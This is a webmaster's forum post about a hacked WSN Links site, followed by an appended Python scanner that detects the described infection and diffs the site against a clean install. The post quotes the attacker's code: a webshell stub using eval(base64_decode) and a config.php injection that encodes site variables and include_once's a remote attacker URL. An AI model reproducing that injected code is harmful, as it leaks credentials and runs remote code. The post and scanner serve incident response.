My links site has been hacked pretty heavily I feel.
Not to degrade the security of WSN, because I think it was through template files which were chmodded to 777.
I noticed some pretty peculiar activity in my raw access logs, calling for files that did not exist, and a name of "bdbjizzazbzeh" doing most of it.
A couple of days later there were derogatory text links added to my wrapper and main tpls. I managed to get rid of those, but after an in-depth look at some of the directories in cPanel, these people had a blast in there.
In any directory with an .htaccess, the .htaccess file within points to a php file they have either created or rewritten. I'm not sure which files are WSN's and which aren't anymore.
As an example, the .htaccess file inside the includes directory reads:
Options -MultiViews
ErrorDocument 404 //includes/commands.php
And the referring commands.php reads:
<?php error_reporting(0);$s="e";$p="bdbjizzazbzeh";eval(base64_decode("[long base64 payload elided]")); ?>
My config.php file has been hit as well, and now has the following at the bottom:
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."bdbjizzazbzeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."bdbjizzazbzeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>
I'm looking for advice at this point. Is it possible for me to download WSN Links again and compare the directory structure and maybe delete the files they have created?
If I save the database and kill the rest, reinstall with the 5.0 series, will it fix me up?
Or can I overwrite with another install of my current version?
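Added example, not from the post or from WSN: a small Python scanner for the three indicators described above (an .htaccess ErrorDocument handing errors to a .php file, eval(base64_decode(...)) in a PHP file, and include_once() of a URL assembled from base64 pieces), plus the "compare against a fresh download" check the poster asks about. The directory layout and file contents in demo() are constructed for illustration, and the hostname/path values from the post are not reused.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the post: an .htaccess ErrorDocument that hands errors to a
# PHP file, eval(base64_decode(...)) webshells, and include(_once) of a URL that is
# assembled from base64 pieces at runtime.
PHP_PATTERNS = {
    "eval(base64_decode(": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "include of base64-built URL": re.compile(r"include(?:_once)?\s*\(\s*base64_decode\s*\("),
}
HTACCESS_PATTERN = re.compile(r"^\s*ErrorDocument\s+\d{3}\s+\S+\.php\b", re.M | re.I)

def scan_tree(root):
    """Return sorted (relative path, indicator) pairs for files matching an indicator."""
    hits = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        text = path.read_text(errors="replace")
        rel = path.relative_to(root).as_posix()
        if path.name == ".htaccess" and HTACCESS_PATTERN.search(text):
            hits.append((rel, "ErrorDocument points at a .php file"))
        elif path.suffix == ".php":
            for label, rx in PHP_PATTERNS.items():
                if rx.search(text):
                    hits.append((rel, label))
    return sorted(hits)

def diff_trees(suspect, clean):
    """Files present only in the suspect tree, and files whose bytes differ from the clean copy."""
    suspect_files = {p.relative_to(suspect).as_posix(): p for p in Path(suspect).rglob("*") if p.is_file()}
    clean_files = {p.relative_to(clean).as_posix(): p for p in Path(clean).rglob("*") if p.is_file()}
    extra = sorted(set(suspect_files) - set(clean_files))
    changed = sorted(n for n in suspect_files
                     if n in clean_files and suspect_files[n].read_bytes() != clean_files[n].read_bytes())
    return {"extra": extra, "changed": changed}

def demo():
    """Build a constructed clean install and an infected copy of it, then run both checks."""
    base = Path(tempfile.mkdtemp())
    clean, bad = base / "clean", base / "site"
    for root in (clean, bad):
        (root / "includes").mkdir(parents=True)
        (root / "config.php").write_text("<?php $dbname = 'links'; ?>\n")
        (root / "includes" / ".htaccess").write_text("Options -MultiViews\n")
    # Constructed infection: the same shape as the post, with harmless sample payloads.
    (bad / "includes" / ".htaccess").write_text("Options -MultiViews\nErrorDocument 404 //includes/commands.php\n")
    (bad / "includes" / "commands.php").write_text('<?php error_reporting(0);eval(base64_decode("ZWNobyAxOw==")); ?>\n')
    (bad / "config.php").write_text('<?php $dbname = \'links\'; include_once(base64_decode("aHR0cDovLw==")."example/?q"); ?>\n')
    return scan_tree(bad), diff_trees(bad, clean)
```

Running scan_tree() over the live site lists files to inspect; diff_trees() against an unpacked fresh download of the same WSN version lists files the attackers added or modified, which answers the "compare the directory structure" question directly.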